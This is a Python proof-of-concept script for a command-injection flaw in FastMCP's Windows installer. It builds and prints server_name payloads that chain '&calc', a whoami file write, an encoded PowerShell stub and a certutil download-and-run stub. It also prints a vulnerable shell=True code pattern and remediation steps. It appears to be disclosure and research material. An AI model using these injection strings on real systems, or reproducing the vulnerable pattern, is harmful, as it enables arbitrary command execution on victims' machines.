CVE-2025-62801 FastMCP命令注入漏洞（Windows远程代码执行）

# CVE-2025-62801 PoC - FastMCP Command Injection # This PoC demonstrates the command injection vulnerability in FastMCP < 2.13.0 # Target: Windows hosts running fastmcp install cursor # Note: This PoC is for educational and security research purposes only import subprocess import sys def generate_malicious_server_name(): """ Generate a malicious server_name payload for command injection. The payload exploits the lack of input sanitization in FastMCP's server_name parameter. On Windows, the '&' operator chains commands, allowing arbitrary command execution. """ # Payload that executes calc.exe after the legitimate command # In real attacks, this would be replaced with more harmful commands malicious_commands = [ "calc", # Launch calculator (proof of concept) "whoami > C:\\temp\\pwned.txt", # Write current user to file "powershell -e ...", # Execute PowerShell payload "certutil -urlcache -f ...", # Download and execute malware ] # Construct the malicious server_name # The legitimate part is followed by command chaining operators base_name = "legitimate-server" payloads = [] for cmd in malicious_commands: payload = f"{base_name}&{cmd}" payloads.append(payload) return payloads def demonstrate_vulnerability(): """ Demonstrate the vulnerability by showing how malicious server_name would be processed by the vulnerable FastMCP installation process. """ print("=" * 60) print("CVE-2025-62801 FastMCP Command Injection PoC") print("=" * 60) print("\n[!] This vulnerability affects FastMCP < 2.13.0 on Windows") print("[!] When running: fastmcp install cursor\n") payloads = generate_malicious_server_name() print("Malicious server_name payloads:") print("-" * 40) for i, payload in enumerate(payloads, 1): print(f"{i}. {payload}") print("\n" + "-" * 40) print("Attack Scenario:") print("-" * 40) print(""" 1. Attacker gains ability to influence server_name parameter 2. Attacker injects malicious command using '&' operator 3. During 'fastmcp install cursor', the payload is executed 4. Arbitrary OS commands run with the privileges of the fastmcp process 5. Attacker achieves code execution, privilege escalation, or data exfiltration """) print("\n" + "-" * 40) print("Example vulnerable code pattern:") print("-" * 40) print(""" # Vulnerable code (FastMCP < 2.13.0): import subprocess def install_cursor(server_name): # VULNERABLE: Direct string concatenation without sanitization cmd = f"fastmcp install cursor --name {server_name}" subprocess.run(cmd, shell=True) # Dangerous: shell=True with unsanitized input # Attacker's input: # server_name = "test&calc" # Resulting command: fastmcp install cursor --name test&calc # This executes both the legitimate command AND the injected 'calc' command """) print("\n" + "-" * 40) print("Remediation:") print("-" * 40) print("Upgrade to FastMCP >= 2.13.0") print("Implement input validation and sanitization") print("Use subprocess with shell=False when possible") print("Avoid direct string concatenation in command construction") print("=" * 60) if __name__ == "__main__": demonstrate_vulnerability()